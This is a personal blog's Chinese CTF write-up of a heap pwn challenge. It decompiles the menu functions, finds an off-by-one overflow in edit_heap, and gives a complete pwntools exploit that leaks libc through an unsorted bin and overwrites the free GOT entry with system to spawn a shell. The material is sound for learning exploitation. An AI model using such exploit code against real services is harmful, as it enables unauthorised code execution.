5.17 考核wp - 超级玉米人的博客

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

320 字

1 分钟

5.17 考核wp

2026-04-17

ctf

ctfwp

/

heap

/

pwn

WP#

将文件拖入 ida 发现这是一道菜单题,进一步分析发现如下重要函数

创建堆块

1
unsigned __int64 create_heap()
2
{
3
  __int64 v0; // rbx
4
  int n9; // [rsp+4h] [rbp-2Ch]
5
  size_t size; // [rsp+8h] [rbp-28h]
6
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
7
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]
8

9
  v5 = __readfsqword(0x28u);
10
  for ( n9 = 0; n9 <= 9; ++n9 )
11
  {
12
    if ( !*(&heaparray + n9) )
13
    {
14
      *(&heaparray + n9) = malloc(0x10u);
15
      if ( !*(&heaparray + n9) )
16
      {
17
        puts("Allocate Error");
18
        exit(1);
19
      }
20
      printf("Size of Heap : ");
21
      read(0, buf, 8u);
22
      size = atoi(buf);
23
      v0 = (__int64)*(&heaparray + n9);
24
      *(_QWORD *)(v0 + 8) = malloc(size);
25
      if ( !*((_QWORD *)*(&heaparray + n9) + 1) )
26
      {
27
        puts("Allocate Error");
28
        exit(2);
29
      }
30
      *(_QWORD *)*(&heaparray + n9) = size;
31
      printf("Content of heap:");
32
      read_input(*((_QWORD *)*(&heaparray + n9) + 1), size);
33
      puts("SuccessFul");
34
      return __readfsqword(0x28u) ^ v5;
35
    }
36
  }
37
  return __readfsqword(0x28u) ^ v5;
38
}

通过分析这个函数可以知道，按照如下结构来进行存储

1
heaparray[]
2

3
malloc(10) struct:
4
 - size
5
 - *data_ptr - malloc(size)

编辑堆块

1
unsigned __int64 edit_heap()
2
{
3
  int n0xA; // [rsp+Ch] [rbp-14h]
4
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
5
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
6

7
  v3 = __readfsqword(0x28u);
8
  printf("Index :");
9
  read(0, buf, 4u);
10
  n0xA = atoi(buf);
11
  if ( (unsigned int)n0xA >= 0xA )
12
  {
13
    puts("Out of bound!");
14
    _exit(0);
15
  }
16
  if ( *(&heaparray + n0xA) )
17
  {
18
    printf("Content of heap : ");
19
    read_input(*((_QWORD *)*(&heaparray + n0xA) + 1), *(_QWORD *)*(&heaparray + n0xA) + 1LL);
20
    puts("Done !");
21
  }
22
  else
23
  {
24
    puts("No such heap !");
25
  }
26
  return __readfsqword(0x28u)^ v3;
27
}

从这里看到在这里存在溢出，可写入的内容比实际size大1,所以存在 one by off

展示堆块

1
unsigned __int64 show_heap()
2
{
3
  int n0xA; // [rsp+Ch] [rbp-14h]
4
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
5
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
6

7
  v3 = __readfsqword(0x28u);
8
  printf("Index :");
9
  read(0, buf, 4u);
10
  n0xA = atoi(buf);
11
  if ( (unsigned int)n0xA >= 0xA )
12
  {
13
    puts("Out of bound!");
14
    _exit(0);
15
  }
16
  if ( *(&heaparray + n0xA) )
17
  {
18
    printf("Size : %ld\nContent : %s\n", *(_QWORD *)*(&heaparray + n0xA), *((const char **)*(&heaparray + n0xA) + 1));
19
    puts("Done !");
20
  }
21
  else
22
  {
23
    puts("No such heap !");
24
  }
25
  return __readfsqword(0x28u) ^ v3;
26
}

这个函数可以直接展示一个堆块的内容

删除堆块

1
unsigned __int64 delete_heap()
2
{
3
  int n0xA; // [rsp+Ch] [rbp-14h]
4
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
5
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
6

7
  v3 = __readfsqword(0x28u);
8
  printf("Index :");
9
  read(0, buf, 4u);
10
  n0xA = atoi(buf);
11
  if ( (unsigned int)n0xA >= 0xA )
12
  {
13
    puts("Out of bound!");
14
    _exit(0);
15
  }
16
  if ( *(&heaparray + n0xA) )
17
  {
18
    free(*((void **)*(&heaparray + n0xA) + 1));
19
    free(*(&heaparray + n0xA));
20
    *(&heaparray + n0xA) = 0;
21
    puts("Done !");
22
  }
23
  else
24
  {
25
    puts("No such heap !");
26
  }
27
  return __readfsqword(0x28u) ^ v3;
28
}

这个函数可以直接删除一个函数的内容,由于在释放堆块后会将指针置0，所以不存在 Uaf

解题#

由于题目中没有提供后门函数,所以需要使用libc, 首先通过malloc 不会初始化chunk内容的特性泄露出 fd指向的 main_arena的地址，从而计算出libc的地址，

同时由于发现 one by off 漏洞，所以可以实现任意地址读写

通过查看 checksec 程序保护发现 GOT 可写。可以选择尝试将free 函数覆盖为 system。

泄露 libc

首先创建 unsortedbins 泄露出指向main_arena 的地址从而计算出 libc 的基地址。

one by off 通过 one by off 实现任意地址读写，这里选择改写 free函数的got表为 system

于是得到如下exp

1
from pwn import *
2

3
file = "./heap_patched"
4
host = "127.0.0.1"
5
port = 1234
6

7
isRemote = False
8

9
context.log_level = "debug"
10
context.binary = file
11

12
if isRemote:
13
    p = remote(host, port)
14
else:
15
    p = process(file)
16

17
elf = ELF(file)
18
rop = ROP(elf)
19
libc = ELF("./libc-2.23.so")
20

21
def menu():
22
    global p
23
    p.recvuntil(b"Your choice :")
24

25
def create_heap(size: int, content: bytes):
26
    global p
27
    menu()
28
    p.sendline(b"1")
29

30
    p.recvuntil(b"Size of Heap : ")
31
    p.sendline(str(size).encode())
32

33
    p.recvuntil(b"Content of heap:")
34
    p.sendline(content)
35

36
def edit_heap(index: int, content: bytes):
37
    global p
38
    menu()
39
    p.sendline(b"2")
40

41
    p.recvuntil(b"Index :")
42
    p.sendline(str(index).encode())
43

44
    p.recvuntil(b"Content of heap : ")
45
    p.sendline(content)
46

47
def show_heap(index: int):
48
    global p
49
    menu()
50
    p.sendline(b"3")
51

52
    p.recvuntil(b"Index :")
53
    p.sendline(str(index).encode())
54

55
def delete_heap(index: int):
56
    global p
57
    menu()
58
    p.sendline(b"4")
59

60
    p.recvuntil(b"Index :")
61
    p.sendline(str(index).encode())
62

63
def exit():
64
    global p
65
    menu()
66
    p.sendline(b"5")
67

68
# unsorted bins
69
create_heap(0xff, b"")  #0
70
create_heap(0xff, b"")  #1
71

72
delete_heap(0)
73
create_heap(0xff, b"aaaaaaaa") #0 fd
74

75
show_heap(0)
76
p.recvuntil(b"a" * 8)
77
leak_str = p.recv(6)
78
leak = u64(leak_str.ljust(8, b"\x00"))
79
offset = 0x3c4b0a
80
libc.address = leak - offset
81

82
system_addr = libc.sym["system"]
83
binsh = next(libc.search(b"/bin/sh\x00"))
84
free = elf.got["free"]
85

86
log.success(f"leak-str: {leak_str}")
87
log.success(f"libcBase: {hex(libc.address)}")
88
log.success(f"binsh: {hex(binsh)}")
89
log.success(f"system: {hex(system_addr)}")
90

91
delete_heap(0)
92
delete_heap(1)
93
# raw_input(f"pwndbg -p {p.pid}")
94

95
# fastbin
96

97
# struct:
98
# size
99
# data_ptr -> malloc(size)
100

101
create_heap(0x18, b"a" * 18) # 0
102
create_heap(0x18, b"b" * 18) # 1
103
create_heap(0x18, b"c" * 18) # 2
104
create_heap(0x18, b"/bin/sh\x00") # 3
105

106
payload = flat(
107
    {
108
        0x18: p8(0x81)
109
    },
110
    filler = b"a"
111
)
112
edit_heap(0, payload)
113
delete_heap(1)
114

115

116
offset = 0x40
117
payload = flat(
118
    {
119
        offset: [
120
            p64(0x8),
121
            p64(free)
122
        ]
123
    }
124
)
125
create_heap(0x70, payload)
126
edit_heap(2, p64(system_addr))
127

128
delete_heap(3)
129
p.interactive()
130
# exit()